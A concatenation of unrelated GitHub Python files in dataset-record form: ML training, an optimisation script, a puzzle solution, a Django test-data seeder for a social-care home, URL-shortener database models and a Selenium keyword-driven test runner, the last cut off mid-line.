print(np.cos(3.14))\n","repo_name":"krizerator/Power-Systems","sub_path":"Power-Systems/power-systems-utilities/power_flow.py","file_name":"power_flow.py","file_ext":"py","file_size_in_byte":9824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1396778004","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport time\nimport os\nimport sys\nimport copy\nimport pickle\n\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.linear_model import LogisticRegression\n\nimport model_utils\nfrom model_utils import get_tabular_data\nimport configs\n\nfrom tensorflow.python.platform import gfile\nfrom batch_generator import BatchGenerator\n\n\n\"\"\"\nEntry point and main loop for train_net.py. Uses command line arguments to get\nmodel and training specification (see config.py).\n\"\"\"\nconfigs.DEFINE_string(\"train_datafile\",None,\"Training file\")\nconfigs.DEFINE_float(\"lr_decay\",0.9, \"Learning rate decay\")\nconfigs.DEFINE_float(\"initial_learning_rate\",1.0,\"Initial learning rate\")\nconfigs.DEFINE_float(\"validation_size\",0.0,\"Size of validation set as %\")\nconfigs.DEFINE_integer(\"passes\",1,\"Passes through day per epoch\")\nconfigs.DEFINE_integer(\"max_epoch\",0,\"Stop after max_epochs\")\nconfigs.DEFINE_integer(\"early_stop\",None,\"Early stop parameter\")\nconfigs.DEFINE_integer(\"seed\",None,\"Seed for deterministic training\")\n\nconfig = configs.get_configs()\n\ndatafile = config.train_datafile if config.train_datafile else config.datafile\n\ntrain_path = model_utils.get_data_path(config.data_dir,datafile)\n\ncache_path = os.path.splitext(train_path)[0] + '.cache'\n\nprint(\"Loading training data ...\")\n\nend_date = config.end_date\n\n############################################################################\n# If cached data doesn't exist, build it\n############################################################################\nif not os.path.exists(cache_path) or config.use_cache is False:\n print(\"Generating Data from Scratch\")\n\n config.end_date = 999901\n\n data_bg = BatchGenerator(train_path, config,\n config.batch_size, config.num_unrollings,\n validation_size=config.validation_size,\n randomly_sample=False)\n\n train_bg = data_bg.train_batches()\n valid_bg = data_bg.valid_batches()\n\n print(\"Grabbing tabular data from batch generator\")\n X_train_full, Y_train_full, dates_train = get_tabular_data(train_bg)\n X_valid_full, Y_valid_full, dates_valid = get_tabular_data(valid_bg)\n\n print(\"Saving tabular data to cache\") \n # JDA 10/27/16: Save these objects to cache here\n if not 
os.path.exists(cache_path):\n os.mkdir(cache_path)\n np.save(os.path.join(cache_path, 'X_train_full.npy'), X_train_full )\n np.save(os.path.join(cache_path, 'Y_train_full.npy'), Y_train_full )\n np.save(os.path.join(cache_path, 'X_valid_full.npy'), X_valid_full )\n np.save(os.path.join(cache_path, 'Y_valid_full.npy'), Y_valid_full )\n np.save(os.path.join(cache_path, 'dates_train.npy'), dates_train )\n np.save(os.path.join(cache_path, 'dates_valid.npy'), dates_valid ) \n \n############################################################################\n# Else load from cache\n############################################################################\nelse:\n print(\"Loading data from cache \"+ cache_path)\n X_train_full = np.load(os.path.join(cache_path, 'X_train_full.npy') )\n Y_train_full = np.load(os.path.join(cache_path, 'Y_train_full.npy') )\n X_valid_full = np.load(os.path.join(cache_path, 'X_valid_full.npy') )\n Y_valid_full = np.load(os.path.join(cache_path, 'Y_valid_full.npy') )\n dates_train = np.load(os.path.join(cache_path, 'dates_train.npy') )\n dates_valid = np.load(os.path.join(cache_path, 'dates_valid.npy') )\n\n#############################################################################\n# Take only those rows that finish before the end date\n#############################################################################\n\ntrain_indices = [i for i in range(len(dates_train)) if dates_train[i] <= end_date]\nvalid_indices = [i for i in range(len(dates_valid)) if dates_valid[i] <= end_date]\n\nX_train = X_train_full[train_indices]\nY_train = Y_train_full[train_indices]\nX_valid = X_valid_full[valid_indices]\nY_valid = Y_valid_full[valid_indices]\n\nprint(\"Data processing complete: end_date is %d\"%end_date)\nprint(\"X_train_full len is: %d\"%len(X_train_full))\nprint(\"X_train len is: %d\"%len(X_train))\n\n############################################################################\n# Instantiate logistic regression classifier (sk-learn) and train\n############################################################################\nclf = LogisticRegression(C=1)\nprint(\"Training logistic regression classifer\")\nclf.fit(X_train, Y_train)\n\ntraining_accuracy = np.mean(clf.predict(X_train) == Y_train)\nprint(\"training accuracy: \", training_accuracy)\n\nvalidation_accuracy = np.mean(clf.predict(X_valid) == Y_valid)\nprint(\"validation accuracy: \", validation_accuracy)\n\n############################################################################\n# Save the model\n############################################################################\nif not os.path.exists(config.model_dir):\n print(\"Creating directory %s\" % config.model_dir)\n os.mkdir(config.model_dir)\n\ncheckpoint_path = os.path.join(config.model_dir, \"logreg.pkl\" )\n\nwith open(checkpoint_path, \"wb\") as f:\n pickle.dump(clf, f)\n\n\n","repo_name":"euclidjda/dnn-quant","sub_path":"scripts/train_log_reg.py","file_name":"train_log_reg.py","file_ext":"py","file_size_in_byte":5156,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"22321182415","text":"import sys, getopt\n\nfrom random import random\nfrom math import exp\nfrom numpy import mean, std\n\ndef simulated_ann(kA, maxIter, x1, x2):\n # parameters\n Ts = 600\n alfa = 0.8\n\n # borders\n lB = (-10)*kA\n hB = (10)*kA\n\n # produce S\n S = [x1, x2]\n oCost = cost(S)\n\n # start iteration\n bC = 0\n curI = 1\n while curI < maxIter:\n nS = produceNeighboor(S, lB, hB)\n nCost = cost(nS)\n\n delta = nCost - 
oCost\n\n        if delta < 0 or exp(-delta/Ts) > random():\n            bC = nCost\n            S = nS\n            oCost = nCost\n        Ts *= alfa\n        curI += 1\n    return bC\n\ndef produceNeighboor(s, lb, hb):\n    ns = [0, 0]\n\n    ns[0] = s[0] + lb+(hb-lb)*random()\n    ns[1] = s[1] + lb+(hb-lb)*random()\n\n    return ns\n\ndef cost(s):\n    x1 = s[0]\n    x2 = s[1]\n    return 100*((x1**2 - x2)**2) + (1 - x1)**2\n\ndef calcAll(ck, ci, cx1, cx2):\n    print(\"========================================\")\n    print (\"x1:\",cx1, \" x2:\",cx2, \" kA:\",ck, \" maxI:\", ci)\n    print(\"---------------------------\")\n    allCost = []\n\n    for i in range(30):\n        allCost.append(simulated_ann(ck, ci, cx1, cx2))\n\n    print(\"mean:\", mean(allCost))\n    print(\"std:\", std(allCost))\n\ndef main(argv):\n    ak = 0\n    ai = 0\n    ax1 = 0\n    ax2 = 0\n\n    try:\n        # getopt short options are single characters, so x1/x2 are exposed as long options only\n        opts, args = getopt.getopt(argv, \"hk:i:\", [\"ka=\", \"it=\", \"x1=\", \"x2=\"])\n    except getopt.GetoptError:\n        print(\"usage: simulated_ann.py -k <kA> -i <maxIter> --x1 <x1> --x2 <x2>\")\n        sys.exit(2)\n    for opt, arg in opts:\n        if opt == '-h':\n            print(\"usage: simulated_ann.py -k <kA> -i <maxIter> --x1 <x1> --x2 <x2>\")\n            sys.exit()\n        elif opt in (\"-k\", \"--ka\"):\n            ak = float(arg)\n        elif opt in (\"-i\", \"--it\"):\n            ai = int(arg)\n        elif opt == \"--x1\":\n            ax1 = int(arg)\n        elif opt == \"--x2\":\n            ax2 = int(arg)\n\n    calcAll(ak, ai, ax1, ax2)\n\nif __name__ == \"__main__\":\n    main(sys.argv[1:])\n\n","repo_name":"ahaltindis/optimization-algorithms","sub_path":"simulated_ann/simulated_ann.py","file_name":"simulated_ann.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35137665896","text":"\"\"\"\n/*\tTurner Atwood\n *\t9/22/18\n *\tIdentifying Map Tiles [1.7]: (https://open.kattis.com/problems/maptiles2)\n *\tTrivial math\n */\t\n\"\"\"\ndef main():\n\tquadkey = input()\n\tzoom = len(quadkey)\n\tcount = 0\n\tspot = [0,0]\n\tfor digit in quadkey[::-1]:\n\t\tdig = int(digit)\n\t\tspot = [spot[0]+dig%2*2**count, spot[1]+dig//2*2**count]\n\t\tcount += 1\n\tprint(zoom, spot[0], spot[1])\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"TurnerAtwood/Kattis","sub_path":"Trivial/IdentifyingMapTiles.py","file_name":"IdentifyingMapTiles.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1457668843","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 10 13:24:56 2021\n\n@author: Aarhon\n\"\"\"\n\nfrom gtts import gTTS \n\nimport os \ndef ttos(r):\n    mytext = r\n    \n    language = 'en'\n    \n    myobj = gTTS(text=mytext, lang=language, slow=False) \n    \n    myobj.save(\"audio.mp3\") \nttos('How you doing')\ns='How you doin'","repo_name":"AarhonJoshuaa/Cloud_Computing","sub_path":"t_to_s.py","file_name":"t_to_s.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42026279861","text":"import os\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'SocialHouse.settings.dev')\n\nimport django\n\ndjango.setup()\n\nfrom datetime import datetime, timedelta\nfrom random import randint, choice\n\nfrom faker import Faker\n\nfrom django.core import management\n\nfrom applications.department.income_data.models import LivingWage, AveragePerCapitaIncome\nfrom applications.department.general_data.models import DepartmentInfo\n\nfrom applications.documentation.acts.models import SocialAct\nfrom applications.department.people.models import ServicedPerson, User, Worker, 
WorkerPosition\nfrom applications.department.people_data.models.serviced_data import PassportData, Privilege, PrivilegeCertificate\n\nfrom applications.social_work.services.enums import ServiceTypeEnum\nfrom applications.department.people.enums import WorkerPositionEnum\nfrom utils.datetime import range_month, random_date_between\nfrom applications.social_work.services.models import ServicesList, Service\nfrom applications.social_work.providing.models import ProvidedJournal, ProvidedService\nfrom applications.documentation.contracts.models import IPPSU, SocialContract, PaidContract\n\nfrom applications.social_work.limitations.enums import PeriodEnum\nfrom applications.social_work.limitations.models import PeriodLimitation, VolumeLimitation\n\nfrom django.conf import settings # correct way\n\nbase_dir = settings.BASE_DIR\nAPPLICATIONS_FOLDER_PATH = os.path.join(base_dir, 'applications')\nfaker = Faker(locale='ru_RU')\nPASSWORD_FOR_TEST_USERS = 'aq12wsde3'\n\n\ndef get_department_info():\n return DepartmentInfo.objects.get_or_create(\n # department_chief=WorkerPosition.objects.filter(position=WorkerPositionEnum.CHIEF).first(),\n department_title=\"отделение социального обслуживания на дому граждан пожилого возраста, \"\n \"проживающих в домах муниципального специализированного жилищного фонда, \"\n \"для социальной защиты отдельных категорий граждан\",\n department_title_short=\"отделение социального обслуживания на дому граждан пожилого возраста, \"\n \"проживающих в домах муниципального специализированного жилищного фонда, \"\n \"для социальной защиты отдельных категорий граждан\",\n\n department_address=\"р.п. Тевриз, ул. Кирова 1а\",\n\n department_address_region=\"Тевризский\",\n department_address_city=\"Тевр��з\",\n department_address_street=\"Кирова\",\n department_address_house=\"1а\",\n\n department_rooms=42,\n department_floors=2,\n\n kcson_chief=\"Ольга Васильевна КЦСОНовна\",\n kcson_chief_short=\"О.В. КЦСОНовна\",\n kcson_title=\"комплексный центр социального обслуживания населения Тевризского района\",\n kcson_title_short=\"КЦСОН Тевризского района\",\n\n )[0]\n\n\ndef generate_privileges():\n print(\"Add standard privileges\")\n privs = (\n \"Ветераны труда\",\n \"Труженики тыла\",\n \"Реабилитированные лица\",\n \"Лица, пострадавшие от политических репрессий\",\n \"Ветераны Омской области\",\n \"Герой СССР, Герой РФ, Герой Соц. 
труда, полный кавалер ордена Трудовой Славы и члены их семей\",\n \"Участники боевых действий и члены их семей\",\n \"Женщины-участницы Великой Отечественной войны\",\n \"Награжденные медалью 'За оборону Ленинграда', знаком 'Жителю блокадного Ленинграда'\",\n \"Лица, проживающие на территории Омской области, которым по состоянию на 9 мая 1945 года не исполнилось 18 лет и родители (один из родителей) которых в период с 22 июня 1941 года по 9 мая 1945 года погибли (пропали без вести), умерли в указанный период вследствие ранения, увечья или заболевания, полученных при защите Отечества или исполнении обязанностей военной службы на фронте, в районах боевых действий\",\n \"Члены семей погибших (умерших) инвалидов войны, участников Великой Отечественной войны и ветеранов боевых действий, члены семей погибших в Великой Отечественной войне лиц из числа личного состава групп самозащиты объектовых и аварийных команд местной противовоздушной обороны, а также члены семей погибших работников госпиталей и больниц города Ленинграда\",\n \"Пострадавшие от техногенных катастроф\",\n \"'Почетный донор России', 'Почетный донор СССР'\",\n \"Граждане, имеющие почетные звания\",\n \"Инвалиды\",\n )\n\n for p in privs:\n Privilege(title=p).save()\n\n\ndef generate_user(nick):\n user = User.objects.get_or_create(\n username=nick\n )[0]\n user.set_password(PASSWORD_FOR_TEST_USERS)\n user.save()\n return user\n\n\ndef generate_worker(status):\n user = generate_user(faker.simple_profile('M')['username'])\n\n if randint(1, 10) % 2:\n # Male\n gender = 'M'\n name = faker.first_name_male()\n patronymic = faker.middle_name_male()\n surname = faker.last_name_male()\n else:\n # Female\n gender = 'F'\n name = faker.first_name_female()\n patronymic = faker.middle_name_female()\n surname = faker.last_name_female()\n date_of_birth = faker.date_of_birth(tzinfo=None, minimum_age=25, maximum_age=55)\n\n worker = Worker.objects.get_or_create(\n user=user,\n gender=gender,\n name=name,\n patronymic=patronymic,\n surname=surname,\n date_of_birth=date_of_birth,\n status=status,\n )[0]\n worker.save()\n return worker\n\n\ndef generate_worker_position(worker=None, position=WorkerPositionEnum.SOCIAL_WORKER, is_dismiss=False):\n worker = worker or generate_worker(Worker.STATUSES[1][0])\n\n date_of_appointment = faker.date_of_birth(tzinfo=None, minimum_age=1, maximum_age=5)\n\n worker_position = WorkerPosition.objects.get_or_create(\n worker=worker,\n position=position,\n date_of_appointment=date_of_appointment,\n rate=1,\n department=get_department_info()\n )[0]\n\n if is_dismiss:\n worker_position.dismissal_date = datetime.now().date() - timedelta(days=randint(1, 180))\n worker.status = Worker.STATUSES[0][0]\n worker.save()\n worker_position.save()\n return worker_position\n\n\ndef get_all_services():\n return ServicesList.objects.last().service_set.all()\n\n\ndef create_included_services(ippsu, cnt=30):\n # not_included_services = get_all_services().by_type.guaranteed()\n not_included_services = Service.by_type.guaranteed().filter(services_list=ServicesList.objects.last())\n while cnt:\n service = choice(not_included_services)\n ippsu.included_services.add(service)\n ippsu.save()\n not_included_services = not_included_services.exclude(pk=service.pk)\n cnt -= 1\n\n\ndef generate_IPPSU(serviced_person, social_worker, date_from, date_to=None, cnt_included=30):\n ippsu = IPPSU.objects.get_or_create(\n serviced_person=serviced_person,\n executor=social_worker,\n date_from=date_from,\n department_info=get_department_info()\n )[0]\n if 
date_to:\n        ippsu.date_expiration = date_to\n        ippsu.save()\n\n    create_included_services(ippsu=ippsu, cnt=cnt_included)\n    return ippsu\n\n\ndef generate_contract_social(serviced_person, social_worker, date_from):\n    contract = SocialContract.objects.get_or_create(\n        serviced_person=serviced_person,\n        executor=social_worker,\n        date_from=date_from,\n        serial_number=str(randint(10000, 99999)),\n        department_info=get_department_info()\n    )[0]\n    contract.save()\n    return contract\n\n\ndef generate_contract_paid(serviced_person, social_worker, date_from):\n    contract = PaidContract.objects.get_or_create(\n        serviced_person=serviced_person,\n        executor=social_worker,\n        date_from=date_from,\n        serial_number=str(randint(10000, 99999)),\n        department_info=get_department_info()\n    )[0]\n    contract.save()\n    return contract\n\n\ndef create_and_fill_contracts_serviced_workers(cnt_workers=3):\n    # cnt_workers = 3\n    # Exclude the dead and the departed\n    serviced = ServicedPerson.objects.exclude(location='LE').exclude(location='DE')\n    serviced_per_worker = serviced.count() // cnt_workers\n    for cur_worker_number in range(cnt_workers):\n        worker_position = generate_worker_position()\n        for cur_serviced_number in range(serviced_per_worker):\n            serviced_person = serviced[(cur_worker_number + 1) * cur_serviced_number]\n\n            # Second IPPSU can be added\n            # if serviced_person.date_of_income - datetime.now().date() < timedelta(days=365 * 3):\n            date_from = min(serviced_person.date_of_income, datetime.now().date() - timedelta(days=365 * 3 - 54))\n            ippsu = generate_IPPSU(serviced_person, worker_position, date_from=date_from, cnt_included=randint(25, 34))\n            contract_social = generate_contract_social(serviced_person, social_worker=worker_position,\n                                                       date_from=date_from)\n            contract_paid = generate_contract_paid(serviced_person, social_worker=worker_position, date_from=date_from)\n            yield ippsu, contract_social, contract_paid\n\n\ndef pop_random_obj_from_q(queryset):\n    random_obj = choice(queryset)\n    # exclude() returns a new queryset, so reassign it for the pop to take effect\n    queryset = queryset.exclude(pk=random_obj.id)\n    return random_obj, queryset\n\n\ndef generate_provided_service(journal, service, date1, date2):\n    date_of = random_date_between(date1, date2)\n    volume = 1\n    if service.volume_limitation:\n        volume = randint(1, service.volume_limitation.limit * 2)\n    quantity = 1\n    if service.period_limitation:\n        quantity = randint(1, service.period_limitation.limit * 2)\n    # volume = randint(1, service.volume_statement.measurement.volume_statement.limit * 2)\n    # quantity = randint(1, service.measurement.period_statement.limit * 2)\n    fields = {\n        'journal': journal,\n        'date_of': date_of,\n        'service': service,\n        'volume': volume,\n        'quantity': quantity,\n    }\n\n    provided_service = ProvidedService.objects.filter(**fields)\n    if provided_service.exists():\n        provided_service = provided_service.first()\n    else:\n        provided_service = ProvidedService.objects.get_or_create(**fields)[0]\n    provided_service.save()\n    print(f\"\\t\\t{provided_service}\")\n\n\ndef create_and_fill_provided_services(ippsu, contract_social, contract_paid, date_from=None, date_to=None, g_count=None,\n                                      a_count=None, p_count=None):\n    # for contracts in IPPSU.objects.filter(is_archived=False):\n    # TODO for many months\n    # Be careful: this creates only the first- and last-month journals\n    date_range = {range_month(date_from), range_month(date_to)}\n    journals = list()\n    for date1, date2 in date_range:\n\n        journal = ProvidedJournal.objects.get_or_create(\n            ippsu=ippsu,\n            date_from=date1,\n            date_to=date2,\n            contract_social=contract_social,\n            contract_paid=contract_paid,\n        )[0]\n\n        # TODO Add it as 
manager\n guaranteed = ippsu.included_services.all()\n additional = get_all_services().filter(type_of_service=ServiceTypeEnum.ADDITIONAL)\n paid = get_all_services().filter(type_of_service=ServiceTypeEnum.PAID)\n\n for g in range(g_count or 20):\n service, guaranteed = pop_random_obj_from_q(guaranteed)\n generate_provided_service(journal, service, date1, date2)\n for a in range(a_count or 15):\n service, additional = pop_random_obj_from_q(additional)\n generate_provided_service(journal, service, date1, date2)\n for p in range(p_count or 5):\n service, paid = pop_random_obj_from_q(paid)\n generate_provided_service(journal, service, date1, date2)\n print(f\"\\tAdd provided journal #{journal.id}_{journal.period()} to {journal.ippsu}\")\n journals.append(journal)\n return journals\n\n\ndef generate_social_act(journal: ProvidedJournal,\n living_wage: LivingWage = None, avg: AveragePerCapitaIncome = None,\n living_tax=6000, avg_tax=5000):\n date_before = journal.date_from - timedelta(days=90)\n living_wage = living_wage or LivingWage.objects.get_or_create(tax=living_tax,\n date_to=date_before)[0]\n\n avg = avg or AveragePerCapitaIncome.objects.get_or_create(\n serviced_person=journal.ippsu.serviced_person,\n date_to=date_before,\n avg_income=avg_tax\n )[0]\n return SocialAct.objects.get_or_create(\n living_wage=living_wage,\n avg_per_capita_income=avg,\n journal=journal,\n )[0]\n\n\nPICKED_ROOMS = list()\n\n\ndef generate_room_and_floor():\n dep = get_department_info()\n room = randint(0, dep.department_rooms)\n while room in PICKED_ROOMS:\n room = randint(0, dep.department_rooms)\n print(f\" Try pick: {room}\")\n PICKED_ROOMS.append(room)\n floor = (room // (dep.department_rooms // dep.department_floors)) + 1\n return room, floor\n\n\ndef generate_serviced(N=30, dead=False, left=False, location=None):\n privils = Privilege.objects.all()\n result = list()\n for i in range(N):\n name, patronymic, surname = '', '', ''\n if randint(1, 10) % 2:\n # Male\n gender = 'M'\n name = faker.first_name_male()\n patronymic = faker.middle_name_male()\n surname = faker.last_name_male()\n else:\n # Female\n gender = 'F'\n name = faker.first_name_female()\n patronymic = faker.middle_name_female()\n surname = faker.last_name_female()\n date_of_birth = faker.date_of_birth(tzinfo=None, minimum_age=50, maximum_age=98)\n contract_number = f\"№{randint(10, 99)}/{randint(10, 99)}\"\n date_of_income = faker.date_of_birth(tzinfo=None, minimum_age=0, maximum_age=2)\n\n date_of_issue = datetime(year=datetime.now().year - randint(0, 15),\n month=date_of_birth.month,\n day=date_of_birth.day)\n\n serviced = ServicedPerson(\n name=name,\n patronymic=patronymic,\n surname=surname,\n gender=gender,\n date_of_birth=date_of_birth,\n # contract_number=contract_number,\n date_of_income=date_of_income,\n # passport_data=passport\n )\n\n if dead:\n serviced.date_of_death = faker.date_of_birth(tzinfo=None, minimum_age=0, maximum_age=3)\n if left:\n serviced.date_of_departure = faker.date_of_birth(tzinfo=None, minimum_age=0, maximum_age=3)\n if location:\n serviced.location = location\n serviced.room, serviced.floor = generate_room_and_floor()\n print(f\" Pick: {serviced.address_in_department()}\")\n serviced.save()\n\n passport = PassportData.objects.get_or_create(\n issued_authority=\"ОВД Тевризского района Омской области\",\n serviced_person=serviced\n )[0]\n for _ in range(randint(randint(0, 3), 3)):\n # TODO changed privilege\n # serviced.privileges.add(choice(privils))\n cert = 
PrivilegeCertificate.objects.get_or_create(privilege=choice(privils), serviced_person=serviced,\n date_of=faker.date_of_birth(tzinfo=None, minimum_age=0,\n maximum_age=5))\n # serviced.privileges.add()\n serviced.save()\n\n passport.save()\n result.append(serviced)\n return result\n\n\ndef set_limits(service, volume_limit, period_limit=0, period_type=None):\n if volume_limit:\n volume_limitation = VolumeLimitation.objects.get_or_create(limit=volume_limit)[0]\n volume_limitation.save()\n service.volume_limitation = volume_limitation\n if period_limit:\n period_limitation = PeriodLimitation.objects.get_or_create(limit=period_limit, period=period_type)[0]\n period_limitation.save()\n service.period_limitation = period_limitation\n return service\n\n\ndef add_random_limits():\n print(\"Add random limits by period and volume to services\")\n all_services = get_all_services()\n guaranteed = all_services.filter(type_of_service=ServiceTypeEnum.GUARANTEED)\n period_choices = [0] * 10 + list(range(1, 5))\n volume_choices = [0] * 10 + list(range(10, 100, 10))\n period_type_choices = PeriodEnum.values\n period_type_choices.remove(None)\n for g in guaranteed:\n set_limits(\n service=g,\n volume_limit=choice(volume_choices),\n period_limit=choice(period_choices),\n period_type=choice(period_type_choices),\n ).save()\n for other in all_services.exclude(type_of_service=ServiceTypeEnum.GUARANTEED):\n set_limits(\n service=other,\n volume_limit=choice(volume_choices),\n # period_limit=choice(period_choices),\n # period_type=choice(PeriodEnum.values),\n ).save()\n\n\ndef create_superuser(login='admin', mail='admin@mail.com', password='qwerty'):\n User.objects.create_superuser(login, mail, password)\n print(\"Erase DB ended, created superuser:\\nadmin: qwerty\")\n\n\ndef flush_db(create_admin=True):\n print(\"Erase DB started\")\n management.call_command('flush', '--noinput', '--settings=SocialHouse.settings.dev')\n if create_admin:\n create_superuser()\n\n\ndef try_load_fixture(fixture_path=''):\n print(\"Trying to load data from fixture\")\n fixture_path = fixture_path or 'services_privs_and_standart_volume_limit.json'\n management.call_command('loaddata', fixture_path)\n\n\ndef load_services():\n srvs_xlsx = '..\\source_data\\services.xlsx'\n print(\"Loading services from %s\" % srvs_xlsx)\n management.call_command('services_import', '--file=' + srvs_xlsx,\n '--settings=SocialHouse.settings.dev')\n\n\ndef do_in_dir(func, path):\n def wrapper(*args, **kwargs):\n temp_path = os.path.abspath(os.curdir)\n print(f\"CurDir: {temp_path}\")\n os.chdir(path)\n print(f\"Changed to: {os.path.abspath(os.curdir)}\")\n result = func(*args, **kwargs)\n os.chdir(temp_path)\n print(f\"Return to: {os.path.abspath(os.curdir)}\")\n return result\n\n return wrapper\n","repo_name":"Kaper156/SocialHouse","sub_path":"scripts/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":19908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17429707938","text":"import os\nimport datetime\n\nfrom sqlalchemy import Table, Column, Integer, String, DateTime, create_engine, MetaData\nfrom sqlalchemy.engine.url import URL\nfrom sqlalchemy.orm import mapper\n\n\nDATABASE = {\n 'drivername': os.environ['DB_TYPE'],\n 'host': os.environ['HOST'],\n 'port': os.environ['IMAGE_PORT'],\n 'username': os.environ['POSTGRES_USER'],\n 'password': os.environ['POSTGRES_PASSWORD'],\n 'database': os.environ['POSTGRES_DB']\n}\n\nengine = create_engine(URL(**DATABASE))\nmetadata = 
MetaData()\n\nurl_table = Table('URL', metadata,\n    Column('hash', String(255), primary_key=True),\n    Column('link', String(255))\n)\n\nlogs_table = Table('Logs', metadata,\n    Column('hash', String(255), primary_key=True),\n    Column('time', DateTime),\n    Column('IP', String(255)),\n    Column('referrer', String(255))\n)\n\n\nclass Log(object):\n    def __init__(self, short_link, seconds, ip, referrer):\n        self.hash = short_link\n        self.time = datetime.datetime.fromtimestamp(seconds)\n        self.ip = ip\n        self.referrer = referrer\n\n\nclass URL(object):\n    def __init__(self, link, short_link):\n        self.hash = short_link\n        self.link = link\n\n\nmapper(URL, url_table)\nmapper(Log, logs_table)\n","repo_name":"theasder/url_shortener","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7399946096","text":"import time\n\nimport xlrd\nimport os\nimport unittest\nimport platform\nimport sys\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common import by\nfrom selenium.webdriver.common.by import By\n\noperation = platform.system()\nif operation == 'Windows':\n    file_path = str(__file__).split(\"\\\\\")[-3]\nelse:\n    file_path = str(__file__).split(\"/\")[-3]\n\ntry:\n    from public.utils import *\n    from public.auto_get_element import auto_get_element\nexcept Exception as e:\n    exec(\"from my_client.%s.public.utils import *\" % file_path)\n    exec(\"from my_client.%s.public.auto_get_element import *\" % file_path)\n\n\nclass Test(unittest.TestCase):\n    @classmethod\n    def setUpClass(cls):\n        cls.driver = webdriver.Chrome()\n        cls.driver.maximize_window()\n        cls.driver.implicitly_wait(5)\n\n    @classmethod\n    def tearDownClass(cls):\n        cls.driver.quit()\n\n    def setUp(self):\n        util_get_index_page(self, host)\n\n    def tearDown(self, method_name):\n        if env == 'local':\n            picture_name = \"../report/picture/%s-%s.png\" % (case_name, method_name)\n        else:\n            picture_name = \"uiApp/static/res_picture/%s-%s.png\" % (case_name, method_name)\n        self.driver.get_screenshot_as_file(picture_name)\n\n    def begin_test(self, case_date):\n        'Test case description goes here'\n        # Fetch the case steps and iterate over them\n        steps = case_date['case_steps']\n        assert_content = {}\n        for step in steps:\n            action = step['action']\n            content = step['content']\n            variable = step['variable']\n\n            res = util_get_locator(self, step['locator'])\n            locator = ()\n            element = ''\n\n            if res is not None:\n                locator = res['locator']\n                index = res['index']\n            if 'assert_exist' in action or '断言存在' in action:  # existence check; equality is handled further below\n                is_exist = True\n                try:\n                    self.driver.find_elements(*locator)[index]\n                except:\n                    is_exist = False\n                self.assertTrue(is_exist)\n                continue\n            try:\n                element = self.driver.find_elements(*locator)[index]\n            except Exception as e:\n                element = auto_get_element(self.driver, res)\n\n            if 'send_key' == action or '输入' == action:\n                element.send_keys(content)\n            elif 'click' in action or '点击' in action:\n                element.click()\n            elif 'get_text' in action or '获取文本' in action:\n                assert_content[variable] = element.get_attribute('innerText')\n            elif 'get_attr' in action or '获取属性' in action:\n                assert_content[variable] = element.get_attribute(content)\n            elif 'assert_contains' in action or '断言包含' in action:\n                print('Performing assertion')\n                assert_list = str(content).split(',')\n                self.assertIn(assert_list[0], assert_content[assert_list[1]])\n            elif 'assert_equal' in action or '断言相等' in action:\n                print('Performing assertion')\n                assert_list = str(content).split(',')\n                self.assertEqual(assert_list[0], assert_content[assert_list[1]])\n            elif 'sleep' 
== action or '等待' == action:\n                time.sleep(float(content))  # cell values may arrive as strings, so cast before sleeping\n\n\ndef to_demo(case_date):\n    # Bind the test data and execute the case\n    def demo(self):\n        Test.begin_test(self, case_date)\n\n    setattr(demo, '__doc__', str(case_date['case_name'] + ':' + case_date['case_des']))\n    return demo\n\n\ndef to_test(excel_data):\n    \"\"\"\n    Convert the rows read from Excel into test cases\n    \"\"\"\n    # Iterate over the sheet contents\n    for i in range(len(excel_data)):\n        # Generate test cases dynamically\n        setattr(Test, 'test_%s' % str(i + 1), to_demo(excel_data[i]))\n\n\ndef read_excel(file_name):\n    file = os.path.dirname(os.path.dirname(__file__)) + \"/case/%s\" % file_name\n    # Open the Excel workbook\n    excel_file = xlrd.open_workbook_xls(filename=file)\n    # Get the target sheet\n    sheet = excel_file.sheet_by_index(0)\n    # Holds the parsed rows; datas format: [{},{}....]\n    datas = []\n    # Total number of rows\n    rows = sheet.nrows\n    case_content = {}\n    # Walk the rows and collect their contents\n    for i in range(0, rows):\n        if 'case' == sheet.cell_value(i, 0):\n            case_content = {'case_name': sheet.cell_value(i, 1), 'case_des': sheet.cell_value(i, 2),\n                            'case_steps': []}\n            datas.append(case_content)\n        else:\n            # A concrete step row\n            step_tmp = {'step': sheet.cell_value(i, 0), 'locator': sheet.cell_value(i, 3),\n                        'action': sheet.cell_value(i, 1), 'content': sheet.cell_value(i, 2),\n                        'variable': sheet.cell_value(i, 4)}\n            case_content['case_steps'].append(step_tmp)\n\n    return datas\n\n\nif __name__ == '__main__':\n    data = read_excel('关键字驱动.xls')\n    to_test(data)\n\n    param = {}\n    try:\n        # Read host, script name and case name from the command-line arguments\n        host = sys.argv[1]\n        script_name = sys.argv[2]\n        case_name = sys.argv[3]\n        env = \"online\"\n    except:\n        # ====================== Fill in the values below for local debugging ======================\n        # ====================== host: address to debug against ======================\n        # ====================== script_name: name of the current script ====================\n        # ====================== case_name: test case name =========================\n        host = \"https://www.baidu.com\"\n        script_name = \"test_py.py\"\n        case_name = \"本地调试\"\n        env = \"local\"\n    param[\"script_name\"] = script_name\n    param[\"case_name\"] = case_name\n    param[\"env\"] = env\n    # unittest.main()\n    util_run_with_report(self=Test, 